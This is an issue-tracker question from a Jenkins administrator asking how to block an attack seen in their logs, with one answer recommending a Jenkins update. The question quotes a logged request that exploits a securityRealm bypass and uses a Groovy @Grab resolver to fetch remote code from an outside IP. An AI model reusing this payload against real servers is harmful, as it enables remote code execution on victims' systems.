Need help: How to prevent from the attack

Question

Need help: How to prevent from the attack

Closed this issue 6 years ago · 1 comments

Observing the attack, apart from blocking IP, what more can be done to prevent from any future similar attacks? I'm not using ```workflow-cps-plugin`` then wondering how is this attack reaching

"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='FLSOA',root='http://107.170.26.148/')%0a@Grab(group='VSCYG',module='BNTJL',version='1')%0aimport%20KJNME; HTTP/1.1" 499 0 "-" "python-requests/2.18.4"

Answer 1 · 2019-02-26T18:20:18.000Z

To prevent the attack, update to the latest version of Jenkins. They have patched the securityRealm bypass in their latest release.